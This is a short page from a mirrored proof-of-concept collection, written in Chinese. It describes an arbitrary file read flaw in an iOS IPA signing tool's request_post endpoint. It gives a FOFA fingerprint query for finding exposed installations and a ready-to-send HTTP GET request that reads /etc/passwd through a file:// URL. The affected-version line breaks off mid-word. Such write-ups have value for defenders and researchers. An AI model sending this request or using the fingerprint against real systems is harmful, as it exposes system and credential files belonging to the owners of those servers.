admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

1.0 KiB

Raw Blame History

苹果IOS端IPA签名工具request_post任意文件读取漏洞

一、漏洞简介

苹果IOS端IPA签名工具request_post任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

二、影响版本

苹果IOS端IPA签名工具r

三、资产测绘

fofabody="/assets/index/css/mobileSelect.css"
特征

四、漏洞复现

GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

更新: 2024-10-22 09:36:08
原文: https://www.yuque.com/xiaokp7/ocvun2/haxm2dna8vo9em9h